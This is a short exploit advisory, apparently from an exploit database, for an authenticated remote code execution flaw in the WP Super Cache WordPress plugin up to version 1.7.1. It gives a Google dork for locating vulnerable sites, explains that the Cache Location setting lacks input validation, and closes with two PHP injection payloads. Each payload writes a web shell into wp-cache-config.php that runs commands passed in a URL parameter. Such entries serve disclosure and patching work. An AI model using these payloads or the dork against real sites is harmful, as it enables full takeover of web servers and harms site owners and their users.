# Exploit Title: WordPress Plugin WP Super Cache 1.7.1 - Remote Code Execution (Authenticated)
# Google Dork: inurl:/wp-content/plugins/wp-super-cache/
# Date: 2021-03-13
# Exploit Author: m0ze
# Version: <= 1.7.1
# Software Link: https://wordpress.org/plugins/wp-super-cache/ ### -- [ Info: ] [i] An Authenticated RCE vulnerability was discovered in the WP Super Cache plugin through 1.7.1 for WordPress. [i] RCE due to input validation failure and weak $cache_path check in the WP Super Cache Settings -> Cache Location option. Direct access to the wp-cache-config.php file is not prohibited, so this vulnerability can be exploited for a web shell injection. [i] Another possible attack vector: from XSS to RCE. ### -- [ Impact: ] [~] Full compromise of the vulnerable web application and also web server. ### -- [ Payloads: ] [$] ';system($_GET[13]);include_once \'wp-cache-config.php\';' [$] ';`$_GET[13]`;include_once \'wp-cache-config.php\';?>
